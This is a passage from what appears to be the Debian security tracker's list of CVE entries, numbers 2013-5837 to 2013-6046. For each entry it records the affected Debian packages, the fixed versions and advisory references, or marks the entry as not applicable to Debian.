	- ikiwiki-hosting 0.20131025
	[wheezy] - ikiwiki-hosting (Minor XSS)
CVE-2013-6046
	RESERVED
CVE-2013-6045 (Multiple heap-based buffer overflows in OpenJPEG 1.3 and earlier might ...)
	{DSA-2808-1}
	- openjpeg 1.3+dfsg-4.7 (bug #731237)
CVE-2013-6044 (The is_safe_url function in utils/http.py in Django 1.4.x before 1.4.6 ...)
	{DSA-2740-1}
	- python-django 1.5.2-1
CVE-2013-6043 (The login function in Softaculous Webuzo before 2.1.4 provides differe ...)
	NOT-FOR-US: Softaculous Webuzo
CVE-2013-6042 (Cross-site scripting (XSS) vulnerability in filemanager/login.php in t ...)
	NOT-FOR-US: Softaculous Webuzo
CVE-2013-6041 (index.php in Softaculous Webuzo before 2.1.4 allows remote attackers t ...)
	NOT-FOR-US: Softaculous Webuzo
CVE-2013-6040 (Multiple unspecified vulnerabilities in the MW6 Aztec, DataMatrix, and ...)
	NOT-FOR-US: MW6 Technologies
CVE-2013-6039 (Multiple cross-site scripting (XSS) vulnerabilities in NagiosQL 3.2 SP ...)
	NOT-FOR-US: NagiosQL
CVE-2013-6038 (Stack-based buffer overflow in Trimble SketchUp Viewer 13.0.4124 allow ...)
	NOT-FOR-US: Trimble SketchUp Viewer
CVE-2013-6037 (Cross-site scripting (XSS) vulnerability in index.php in Aker Secure M ...)
	NOT-FOR-US: Aker Secure Mail Gateway
CVE-2013-6036
	RESERVED
CVE-2013-6035 (The firmware on GateHouse; Harris BGAN RF-7800B-VU204 and BGAN RF-7800 ...)
	NOT-FOR-US: Inmarsat broadband satellite terminals
CVE-2013-6034 (The firmware on GateHouse; Harris BGAN RF-7800B-VU204 and BGAN RF-7800 ...)
	NOT-FOR-US: Inmarsat broadband satellite terminals
CVE-2013-6033 (Multiple cross-site scripting (XSS) vulnerabilities on Lexmark W840 th ...)
	NOT-FOR-US: Lexmark
CVE-2013-6032 (cgi-bin/postpf/cgi-bin/dynamic/config/config.html on Lexmark X94x befo ...)
	NOT-FOR-US: Lexmark
CVE-2013-6031 (The Huawei E355 adapter with firmware 21.157.37.01.910 does not requir ...)
	NOT-FOR-US: Huawei E355 adapter
CVE-2013-6030 (Directory traversal vulnerability on the Emerson Network Power Avocent ...)
	NOT-FOR-US: Emerson Network Power
CVE-2013-6029 (Stack-based buffer overflow in the AT&T Connect Participant Applic ...)
	NOT-FOR-US: AT&T Connect Participant Application
CVE-2013-6028 (Multiple cross-site request forgery (CSRF) vulnerabilities in Atmail W ...)
	NOT-FOR-US: Atmail Webmail Server
CVE-2013-6027 (Stack-based buffer overflow in the RuntimeDiagnosticPing function in / ...)
	NOT-FOR-US: D-Link
CVE-2013-6026 (The web interface on D-Link DIR-100, DIR-120, DI-624S, DI-524UP, DI-60 ...)
	NOT-FOR-US: D-Link
CVE-2013-6025 (The XMLParse procedure in SAP Sybase Adaptive Server Enterprise (ASE) ...)
	NOT-FOR-US: SAP Sybase Adaptive Server Enterprise
CVE-2013-6024 (The Edge Client components in F5 BIG-IP APM 10.x, 11.x, 12.x, 13.x, an ...)
	NOT-FOR-US: F5 BIG-IP
CVE-2013-6023 (Directory traversal vulnerability in the TVT TD-2308SS-B DVR with firm ...)
	NOT-FOR-US: TVT TD-2308SS-B DVR
CVE-2013-6022 (A Cross-Site Scripting (XSS) vulnerability exists in Tiki Wiki CMG Gro ...)
	- tikiwiki
CVE-2013-6021 (Buffer overflow in WGagent in WatchGuard WSM and Fireware before 11.8 ...)
	NOT-FOR-US: WatchGuard WSM and Fireware
CVE-2013-6020 (passwordRequestPOST.jsp in Tyler Technologies TaxWeb 3.13.3.1 sends di ...)
	NOT-FOR-US: Tyler Technologies TaxWeb
CVE-2013-6019 (Cross-site scripting (XSS) vulnerability in Tyler Technologies TaxWeb ...)
	NOT-FOR-US: Tyler Technologies TaxWeb
CVE-2013-6018 (Cross-site request forgery (CSRF) vulnerability in login.jsp in Tyler ...)
	NOT-FOR-US: Tyler Technologies TaxWeb
CVE-2013-6017 (Cross-site scripting (XSS) vulnerability in Atmail Webmail Server befo ...)
	NOT-FOR-US: Atmail Webmail Server
CVE-2013-6016 (The Traffic Management Microkernel (TMM) in F5 BIG-IP LTM, APM, ASM, E ...)
	NOT-FOR-US: F5
CVE-2013-6015 (Juniper Junos before 10.4S14, 11.4 before 11.4R5-S2, 12.1R before 12.1 ...)
	NOT-FOR-US: Juniper Junos
CVE-2013-6014 (Juniper Junos 10.4 before 10.4S15, 11.4 before 11.4R9, 11.4X27 before ...)
	NOT-FOR-US: Juniper Junos
CVE-2013-6013 (Buffer overflow in the flow daemon (flowd) in Juniper Junos 10.4 befor ...)
	NOT-FOR-US: Juniper Junos
CVE-2013-6012 (Juniper Junos 12.1X44 before 12.1.X44-D20 and 12.1X45 before 12.1X45-D ...)
	NOT-FOR-US: Juniper Junos
CVE-2013-6011 (Citrix NetScaler Application Delivery Controller (ADC) 10.0 before 10. ...)
	NOT-FOR-US: Citrix NetScaler Application Delivery Controller
CVE-2013-6010 (Cross-site scripting (XSS) vulnerability in the Comment Attachment plu ...)
	NOT-FOR-US: Wordpress Comment-Attachment plugin
CVE-2013-6009 (CRLF injection vulnerability in Open-Xchange AppSuite before 7.2.2, wh ...)
	NOT-FOR-US: Open-Xchange
CVE-2013-6008
	REJECTED
CVE-2013-6007
	REJECTED
CVE-2013-6006 (Cybozu Garoon 3.5 through 3.7 SP2 allows remote attackers to bypass Ke ...)
	NOT-FOR-US: Cybozu Garoon
CVE-2013-6005 (Cross-site scripting (XSS) vulnerability in Cybozu Dezie before 8.1.0 ...)
	NOT-FOR-US: Cybozu Dezie
CVE-2013-6004 (Session fixation vulnerability in Cybozu Garoon before 3.7.2 allows re ...)
	NOT-FOR-US: Cybozu Garoon
CVE-2013-6003 (CRLF injection vulnerability in Cybozu Garoon 3.1 through 3.5 SP5, whe ...)
	NOT-FOR-US: Cybozu Garoon
CVE-2013-6002 (The server in Cybozu Garoon before 3.7 SP1 allows remote attackers to ...)
	NOT-FOR-US: Cybozu Garoon
CVE-2013-6001 (SQL injection vulnerability in the Space function in Cybozu Garoon bef ...)
	NOT-FOR-US: Cybozu Garoon
CVE-2013-6000 (Directory traversal vulnerability in Tattyan HP TOWN before 5_10_1 all ...)
	NOT-FOR-US: Tattyan HP TOWN
CVE-2013-5999 (Kingsoft KDrive Personal before 1.21.0.1880 on Windows does not verify ...)
	NOT-FOR-US: Kingsoft KDrive Personal
CVE-2013-5998 (Unspecified vulnerability in the Web manager implementation on D-Link ...)
	NOT-FOR-US: D-Link
CVE-2013-5997 (Unspecified vulnerability in the SSH implementation on D-Link Japan DE ...)
	NOT-FOR-US: D-Link
CVE-2013-5996 (Multiple cross-site scripting (XSS) vulnerabilities in shopping/paymen ...)
	NOT-FOR-US: LOCKON EC-CUBE
CVE-2013-5995 (data/class/helper/SC_Helper_Address.php in the front-features implemen ...)
	NOT-FOR-US: LOCKON EC-CUBE
CVE-2013-5994 (data/class/pages/mypage/LC_Page_Mypage_DeliveryAddr.php in LOCKON EC-C ...)
	NOT-FOR-US: LOCKON EC-CUBE
CVE-2013-5993 (Cross-site request forgery (CSRF) vulnerability in LOCKON EC-CUBE 2.11 ...)
	NOT-FOR-US: LOCKON EC-CUBE
CVE-2013-5992 (Cross-site scripting (XSS) vulnerability in the displaySystemError fun ...)
	NOT-FOR-US: LOCKON EC-CUBE
CVE-2013-5991 (The displaySystemError function in html/handle_error.php in LOCKON EC- ...)
	NOT-FOR-US: LOCKON EC-CUBE
CVE-2013-5990 (Unspecified vulnerability in JustSystems Ichitaro 2006 through 2011; I ...)
	NOT-FOR-US: JustSystems Ichitaro
CVE-2013-5989
	REJECTED
CVE-2013-5988 (A Cross-site Scripting (XSS) vulnerability exists in the All in One SE ...)
	NOT-FOR-US: All in One SEO Pack plugin for WordPress
CVE-2013-5987 (Unspecified vulnerability in NVIDIA graphics driver Release 331, 325, ...)
	- nvidia-graphics-drivers 304.117-1 (bug #735271)
	[squeeze] - nvidia-graphics-drivers (Non-free not supported)
	NOTE: http://nvidia.custhelp.com/app/answers/detail/a_id/3377
CVE-2013-5986 (Unspecified vulnerability in NVIDIA graphics driver Release 331, 325, ...)
	- nvidia-graphics-drivers 304.117-1 (bug #735271)
	[squeeze] - nvidia-graphics-drivers (Non-free not supported)
	NOTE: http://nvidia.custhelp.com/app/answers/detail/a_id/3377
CVE-2013-5985
	RESERVED
CVE-2013-5984 (Directory traversal vulnerability in userfiles/modules/admin/backup/de ...)
	NOT-FOR-US: Microweber
CVE-2013-5983 (Multiple cross-site scripting (XSS) vulnerabilities in GuppY before 4. ...)
	NOT-FOR-US: GuppY
CVE-2013-5982
	RESERVED
CVE-2013-5981
	RESERVED
CVE-2013-5980
	RESERVED
CVE-2013-5979 (Directory traversal vulnerability in Spring Signage Xibo 1.2.x before ...)
	NOT-FOR-US: Xibo
CVE-2013-5978 (Multiple cross-site scripting (XSS) vulnerabilities in products.php in ...)
	NOT-FOR-US: Cart66 Lite plugin for WordPress
CVE-2013-5977 (Cross-site request forgery (CSRF) vulnerability in Cart66Product.php i ...)
	NOT-FOR-US: Cart66 Lite plugin for WordPress
CVE-2013-5976 (Cross-site scripting (XSS) vulnerability in the access policy logout p ...)
	NOT-FOR-US: F5 BIG-IP APM
CVE-2013-5975 (The access policy logon page (logon.inc) in F5 BIG-IP APM 11.1.0 throu ...)
	NOT-FOR-US: F5 BIG-IP APM
CVE-2013-5974
	REJECTED
CVE-2013-5973 (VMware ESXi 4.0 through 5.5 and ESX 4.0 and 4.1 allow local users to r ...)
	NOT-FOR-US: VMware ESXi and ESX
CVE-2013-5972 (VMware Workstation 9.x before 9.0.3 and VMware Player 5.x before 5.0.3 ...)
	NOT-FOR-US: VMware
CVE-2013-5971 (Session fixation vulnerability in the vSphere Web Client Server in VMw ...)
	NOT-FOR-US: VMware vSphere
CVE-2013-5970 (hostd-vmdb in VMware ESXi 4.0 through 5.0 and ESX 4.0 through 4.1 allo ...)
	NOT-FOR-US: VMware ESXi and ESX
CVE-2013-5969
	RESERVED
CVE-2013-5968 (Cross-site scripting (XSS) vulnerability in CA SiteMinder 12.0 through ...)
	NOT-FOR-US: CA SiteMinder
CVE-2013-5967 (Multiple SQL injection vulnerabilities in AlienVault Open Source Secur ...)
	NOT-FOR-US: AlienVault Open Source Security Information Management
CVE-2013-5966 (Cross-site scripting (XSS) vulnerability in ZK Framework before 5.0.13 ...)
	NOT-FOR-US: ZK Framework
CVE-2013-5965 (The Node View Permissions module 7.x-1.x before 7.x-1.2 for Drupal doe ...)
	NOT-FOR-US: Drupal addon
CVE-2013-5964 (Cross-site scripting (XSS) vulnerability in the administration page in ...)
	NOT-FOR-US: Drupal addon
CVE-2013-5963 (Unrestricted file upload vulnerability in multi.php in Simple Dropbox ...)
	NOT-FOR-US: WordPress plugin Simple Dropbox Upload
CVE-2013-5962 (Unrestricted file upload vulnerability in frames/upload-images.php in ...)
	NOT-FOR-US: Complete Gallery Manager plugin for Wordpress
CVE-2013-5961 (Unrestricted file upload vulnerability in lazyseo.php in the Lazy SEO ...)
	NOT-FOR-US: WordPress plugin Lazy SEO
CVE-2013-5960 (The authenticated-encryption feature in the symmetric-encryption imple ...)
	NOT-FOR-US: OWASP Enterprise Security API for Java
CVE-2013-5958 (The Security component in Symfony 2.0.x before 2.0.25, 2.1.x before 2. ...)
	- symfony (Fixed before initial upload)
CVE-2013-5957 (Multiple SQL injection vulnerabilities in CRM/Core/Page/AJAX/Location. ...)
	- civicrm (Fixed before initial upload to the archive)
CVE-2013-5956 (Cross-site scripting (XSS) vulnerability in includes/flvthumbnail.php ...)
	NOT-FOR-US: Joomla plugin
CVE-2013-5955 (Cross-site scripting (XSS) vulnerability in manage.php in the PBBookin ...)
	NOT-FOR-US: Joomla plugin
CVE-2013-5954 (Multiple cross-site request forgery (CSRF) vulnerabilities in OpenX 2. ...)
	NOT-FOR-US: OpenX
CVE-2013-5953 (Multiple cross-site scripting (XSS) vulnerabilities in tmpl/layout_edi ...)
	NOT-FOR-US: Joomla component multi calendar
CVE-2013-5952 (Multiple cross-site scripting (XSS) vulnerabilities in the Freichat (c ...)
	NOT-FOR-US: Joomla component Freichat
CVE-2013-5951 (Multiple cross-site scripting (XSS) vulnerabilities in eXtplorer 2.1.3 ...)
	{DSA-2882-1}
	- extplorer (bug #741908)
	NOTE: http://seclists.org/fulldisclosure/2014/Mar/273
CVE-2013-5950
	RESERVED
CVE-2013-5949
	RESERVED
CVE-2013-5948 (The Network Analysis tab (Main_Analysis_Content.asp) in the ASUS RT-AC ...)
	NOT-FOR-US: ASUS router
CVE-2013-5947
	RESERVED
CVE-2013-5946 (The runShellCmd function in systemCheck.htm in D-Link DSR-150 with fir ...)
	NOT-FOR-US: D-Link
CVE-2013-5945 (Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware ...)
	NOT-FOR-US: D-Link
CVE-2013-5944 (The integrated web server on Siemens SCALANCE X-200 switches with firm ...)
	NOT-FOR-US: web server on Siemens switches
CVE-2013-5959 (Blue Coat ProxySG before 6.2.14.1, 6.3.x, 6.4.x, and 6.5 before 6.5.2 ...)
	NOT-FOR-US: Blue Coat ProxySG
CVE-2013-5943 (Multiple cross-site scripting (XSS) vulnerabilities in Graphite before ...)
	- graphite-web 0.9.12+debian-1
CVE-2013-5942 (Graphite 0.9.5 through 0.9.10 uses the pickle Python module unsafely, ...)
	- graphite-web 0.9.12+debian-1
CVE-2013-5941
	RESERVED
CVE-2013-5940
	RESERVED
CVE-2013-5939 (Multiple cross-site scripting (XSS) vulnerabilities in the Guestbook m ...)
	NOT-FOR-US: PHPCMS
CVE-2013-5938 (Cross-site scripting (XSS) vulnerability in the Click2Sell Suite modul ...)
	NOT-FOR-US: Click2Sell Suite Drupal contributed module
CVE-2013-5937 (Cross-site request forgery (CSRF) vulnerability in the Click2Sell Suit ...)
	NOT-FOR-US: Click2Sell Suite Drupal contributed module
CVE-2013-5936 (The Hazelcast cluster API in Open-Xchange AppSuite 7.0.x before 7.0.2- ...)
	NOT-FOR-US: Open-Xchange
CVE-2013-5935 (The Hazelcast cluster API in Open-Xchange AppSuite 7.0.x before 7.0.2- ...)
	NOT-FOR-US: Open-Xchange
CVE-2013-5934 (Open-Xchange AppSuite 7.0.x before 7.0.2-rev15 and 7.2.x before 7.2.2- ...)
	NOT-FOR-US: Open-Xchange
CVE-2013-5933 (Stack-based buffer overflow in the sub_E110 function in init in a cert ...)
	NOT-FOR-US: Motorola
CVE-2013-5932 (Unspecified vulnerability in WebAdmin in Sophos UTM (aka Astaro Securi ...)
	NOT-FOR-US: Sophos UTM
CVE-2013-5931 (SQL injection vulnerability in property_listings_detail.php in Real Es ...)
	NOT-FOR-US: Real Estate PHP Script
CVE-2013-5930 (Cross-site scripting (XSS) vulnerability in search_residential.php in ...)
	NOT-FOR-US: Real Estate PHP Script
CVE-2013-5929
	RESERVED
CVE-2013-5928
	RESERVED
CVE-2013-5927
	RESERVED
CVE-2013-5926
	RESERVED
CVE-2013-5925
	RESERVED
CVE-2013-5924
	RESERVED
CVE-2013-5923
	RESERVED
CVE-2013-5922
	RESERVED
CVE-2013-5921
	RESERVED
CVE-2013-5920
	RESERVED
CVE-2013-5919 (Suricata before 1.4.6 allows remote attackers to cause a denial of ser ...)
	- suricata 2.0-1 (bug #751658)
	[wheezy] - suricata (Minor issue)
	[squeeze] - suricata (Minor issue)
	NOTE: https://github.com/OISF/suricata/commit/cd80dcbfd4616582daa39fa56960208ee8e23262
CVE-2013-5918 (Cross-site scripting (XSS) vulnerability in platinum_seo_pack.php in t ...)
	NOT-FOR-US: Platinum SEO plugin for WordPress
CVE-2013-5917 (SQL injection vulnerability in wp-comments-post.php in the NOSpam PTI ...)
	NOT-FOR-US: NOSpam PTIa plugin for Wordpress
CVE-2013-5916 (Cross-site scripting (XSS) vulnerability in falha.php in the Bradesco ...)
	NOT-FOR-US: WordPress plugin wp-e-commerce
CVE-2013-5915 (The RSA-CRT implementation in PolarSSL before 1.2.9 does not properly ...)
	{DSA-2782-1}
	- polarssl 1.3.1-1 (bug #725359)
	NOTE: https://polarssl.org/tech-updates/security-advisories/polarssl-security-advisory-2013-05
CVE-2013-5914 (Buffer overflow in the ssl_read_record function in ssl_tls.c in PolarS ...)
	{DSA-2782-1}
	- polarssl 1.2.0-1 (bug #725359)
	NOTE: https://polarssl.org/tech-updates/security-advisories/polarssl-security-advisory-2013-04
CVE-2013-5913 (Cross-site scripting (XSS) vulnerability in the getRecommSearch functi ...)
	NOT-FOR-US: OXID eShop
CVE-2013-5912 (VhttpdMgr in Thomson Reuters Velocity Analytics Vhayu Analytic Server ...)
	NOT-FOR-US: Thomson Reuters Velocity Analytics Vhayu Analytic Server
CVE-2013-5911 (Cross-site scripting (XSS) vulnerability in devform.php in Tenable Sec ...)
	NOT-FOR-US: Tenable SecurityCenter
CVE-2013-5910 (Unspecified vulnerability in Oracle Java SE 6u65 and 7u45, Java SE Emb ...)
	- openjdk-6 6b30-1.13.1-1
	- openjdk-7 7u51-2.4.4-1
CVE-2013-5909 (Unspecified vulnerability in the PeopleSoft Enterprise HRMS component ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-5908 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...)
	{DSA-2848-1 DSA-2845-1}
	- mariadb-5.5 5.5.35-1
	- mariadb-10.0 (Fixed before initial upload)
	- mysql-5.5 5.5.35+dfsg-1
	- mysql-5.1
	- percona-xtradb-cluster-5.5 5.5.37-25.10+dfsg-1
CVE-2013-5907 (Unspecified vulnerability in Oracle Java SE 5.0u55, 6u65, and 7u45; JR ...)
	- openjdk-6 6b30-1.13.1-1
	- openjdk-7 7u51-2.4.4-1
CVE-2013-5906 (Unspecified vulnerability in Oracle Java SE 5.0u55, 6u65, and 7u45 all ...)
	- openjdk-6 (Installation performed differently for Linux distros)
	- openjdk-7 (Installation performed differently for Linux distros)
CVE-2013-5905 (Unspecified vulnerability in Oracle Java SE 5.0u55, 6u65, and 7u45 all ...)
	- openjdk-6 (Installation performed differently for Linux distros)
	- openjdk-7 (Installation performed differently for Linux distros)
CVE-2013-5904 (Unspecified vulnerability in Oracle Java SE 7u45 allows remote attacke ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-5903
	REJECTED
CVE-2013-5902 (Unspecified vulnerability in Oracle Java SE 6u65 and 7u45 allows remot ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-5901 (Unspecified vulnerability in the Oracle Identity Manager component in ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-5900 (Unspecified vulnerability in the Oracle Identity Manager component in ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-5899 (Unspecified vulnerability in Oracle Java SE 6u65 and 7u45 allows remot ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-5898 (Unspecified vulnerability in Oracle Java SE 6u65 and 7u45 allows remot ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-5897 (Unspecified vulnerability in the Oracle Agile Product Lifecycle Manage ...)
	NOT-FOR-US: Oracle Supply Chain Products Suite
CVE-2013-5896 (Unspecified vulnerability in Oracle Java SE 5.0u55, 6u65, and 7u45; Ja ...)
	- openjdk-6 6b30-1.13.1-1
	- openjdk-7 7u51-2.4.4-1
CVE-2013-5895 (Unspecified vulnerability in Oracle Java SE 7u45 and JavaFX 2.2.45 all ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-5894 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...)
	- mysql-5.5 (Only affects Mysql 5.6)
	- mysql-5.1 (Only affects Mysql 5.6)
CVE-2013-5893 (Unspecified vulnerability in Oracle Java SE 7u45 and Java SE Embedded ...)
	- openjdk-6 (Only affects OpenJDK 7)
	- openjdk-7 7u51-2.4.4-1
CVE-2013-5892 (Unspecified vulnerability in the Oracle VM VirtualBox component in Ora ...)
	{DSA-2878-1}
	- virtualbox-ose (low)
	- virtualbox 4.3.6-dfsg-1 (low; bug #735410)
CVE-2013-5891 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...)
	{DSA-2848-1}
	- mariadb-5.5 5.5.35-1
	- mariadb-10.0 (Fixed before initial upload)
	- mysql-5.5 5.5.35+dfsg-1
	- mysql-5.1 (Only affects 5.5 and 5.6)
	- percona-xtradb-cluster-5.5 5.5.37-25.10+dfsg-1
CVE-2013-5890 (Unspecified vulnerability in the Oracle Payroll component in Oracle E- ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2013-5889 (Unspecified vulnerability in Oracle Java SE 6u65 and 7u45 allows remot ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-5888 (Unspecified vulnerability in Oracle Java SE 6u65 and 7u45, when runnin ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-5887 (Unspecified vulnerability in Oracle Java SE 6u65 and 7u45 allows remot ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-5886 (Unspecified vulnerability in the PeopleSoft Enterprise HRMS component ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-5885 (Unspecified vulnerability in Oracle Solaris 11.1 allows local users to ...)
	NOT-FOR-US: Oracle Solaris
CVE-2013-5884 (Unspecified vulnerability in Oracle Java SE 5.0u55, 6u65, and 7u45; Ja ...)
	- openjdk-6 6b30-1.13.1-1
	- openjdk-7 7u51-2.4.4-1
CVE-2013-5883 (Unspecified vulnerability in Oracle Solaris 8 allows local users to af ...)
	NOT-FOR-US: Oracle Solaris
CVE-2013-5882 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...)
	- mysql-5.5 (Only affects Mysql 5.6)
	- mysql-5.1 (Only affects Mysql 5.6)
CVE-2013-5881 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...)
	- mysql-5.5 (Only affects Mysql 5.6)
	- mysql-5.1 (Only affects Mysql 5.6)
CVE-2013-5880 (Unspecified vulnerability in the Oracle Demantra Demand Management com ...)
	NOT-FOR-US: Oracle Supply Chain Products Suite
CVE-2013-5879 (Unspecified vulnerability in the Oracle Outside In Technology componen ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-5878 (Unspecified vulnerability in Oracle Java SE 6u65 and 7u45, Java SE Emb ...)
	- openjdk-6 6b30-1.13.1-1
	- openjdk-7 7u51-2.4.4-1
CVE-2013-5877 (Unspecified vulnerability in the Oracle Demantra Demand Management com ...)
	NOT-FOR-US: Oracle Supply Chain Products Suite
CVE-2013-5876 (Unspecified vulnerability in Oracle Solaris 10 and 11.1 allows local u ...)
	NOT-FOR-US: Oracle Solaris
CVE-2013-5875 (Unspecified vulnerability in Oracle Solaris 11.1 allows local users to ...)
	NOT-FOR-US: Oracle Solaris
CVE-2013-5874 (Unspecified vulnerability in the Oracle Application Object Library com ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2013-5873 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-5872 (Unspecified vulnerability in Oracle Solaris 10 and 11.1 allows local u ...)
	NOT-FOR-US: Oracle Solaris
CVE-2013-5871 (Unspecified vulnerability in the Oracle AutoVue Electro-Mechanical Pro ...)
	NOT-FOR-US: Oracle Supply Chain Products
CVE-2013-5870 (Unspecified vulnerability in Oracle Java SE 7u45 and JavaFX 2.2.45 all ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-5869 (Unspecified vulnerability in the Oracle WebCenter Portal component in ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2013-5868 (Unspecified vulnerability in the Oracle AutoVue Electro-Mechanical Pro ...)
	NOT-FOR-US: Oracle Supply Chain Products
CVE-2013-5867 (Unspecified vulnerability in the Siebel Core - Server Infrastructure c ...)
	NOT-FOR-US: Oracle Siebel CRM
CVE-2013-5866 (Unspecified vulnerability in Oracle Solaris 11.1 allows local users to ...)
	NOT-FOR-US: Solaris
CVE-2013-5865 (Unspecified vulnerability in Oracle Solaris 11.1 allows local users to ...)
	NOT-FOR-US: Solaris
CVE-2013-5864 (Unspecified vulnerability in Oracle Solaris 10 and 11.1 allows local u ...)
	NOT-FOR-US: Solaris
CVE-2013-5863 (Unspecified vulnerability in Oracle Solaris 11.1 allows remote attacke ...)
	NOT-FOR-US: Solaris
CVE-2013-5862 (Unspecified vulnerability in Oracle Solaris 10 and 11.1 allows local u ...)
	NOT-FOR-US: Solaris
CVE-2013-5861 (Unspecified vulnerability in Oracle Solaris 11.1 allows remote attacke ...)
	NOT-FOR-US: Solaris
CVE-2013-5860 (Unspecified vulnerability in the MySQL Server component in Oracle MySQ ...)
	- mysql-5.5 (Only affects Mysql 5.6)
	- mysql-5.1 (Only affects Mysql 5.6)
CVE-2013-5859 (Unspecified vulnerability in the Instantis EnterpriseTrack component i ...)
	NOT-FOR-US: Oracle Primavera Products Suite
CVE-2013-5858 (Unspecified vulnerability in the Core RDBMS component in Oracle Databa ...)
	NOT-FOR-US: Oracle Database Server
CVE-2013-5857 (Unspecified vulnerability in the Oracle Health Sciences InForm compone ...)
	NOT-FOR-US: Oracle Industry Applications
CVE-2013-5856 (Unspecified vulnerability in the Oracle Health Sciences InForm compone ...)
	NOT-FOR-US: Oracle Industry Applications
CVE-2013-5855 (Oracle Mojarra 2.2.x before 2.2.6 and 2.1.x before 2.1.28 does not per ...)
	- mojarra 2.2.8-1 (low; bug #740586)
	[squeeze] - mojarra (Minor issue)
	[wheezy] - mojarra (Minor issue)
	NOTE: https://java.net/jira/browse/JAVASERVERFACES-3150
	NOTE: https://java.net/projects/mojarra/sources/svn/revision/12793
CVE-2013-5854 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier and JavaF ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-5853 (Unspecified vulnerability in the Core RDBMS component in Oracle Databa ...)
	NOT-FOR-US: Oracle Database Server
CVE-2013-5852 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-5851 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier and Java ...)
	- openjdk-6 (Only affects Java 7)
	- openjdk-7 7u45-2.4.3-1
CVE-2013-5850 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 6b27-1.12.7-1
	- openjdk-7 7u45-2.4.3-1
CVE-2013-5849 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 6b27-1.12.7-1
	- openjdk-7 7u45-2.4.3-1
CVE-2013-5848 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 (Deployment components not part of OpenJDK, only present in Oracle Java)
	- openjdk-7 (Deployment components not part of OpenJDK, only present in Oracle Java)
CVE-2013-5847 (Unspecified vulnerability in the PeopleSoft Enterprise HRMS eCompensat ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-5846 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, and Java ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-5845 (Unspecified vulnerability in the Oracle iLearning component in Oracle ...)
	NOT-FOR-US: Oracle iLearning
CVE-2013-5844 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier and JavaF ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
CVE-2013-5843 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 (Specific to Oracle Java, not present in IcedTea)
	- openjdk-7 (Specific to Oracle Java, not present in IcedTea)
	NOTE: Due to Oracle's vague disclosure policy the exact nature is unknown, but since no patch landed in IcedTea we consider it not-affected
CVE-2013-5842 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 6b27-1.12.7-1
	- openjdk-7 7u45-2.4.3-1
CVE-2013-5841 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools com ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2013-5840 (Unspecified vulnerability in Oracle Java SE 7u40 and earlier, Java SE ...)
	- openjdk-6 6b27-1.12.7-1
	- openjdk-7 7u45-2.4.3-1
CVE-2013-5839 (Unspecified vulnerability in Oracle Solaris 10 allows remote attackers ...)
	NOT-FOR-US: Solaris
CVE-2013-5838 (Unspecified vulnerability in Oracle Java SE 7u25 and earlier, and Java ...)
	- openjdk-6 (Only affects Java 7)
	- openjdk-7 7u45-2.4.3-1
CVE-2013-5837 (Unspecified vulnerability in the Oracle Health Sciences InForm compone ...)
	NOT-FOR-US: Oracle Industry Applications
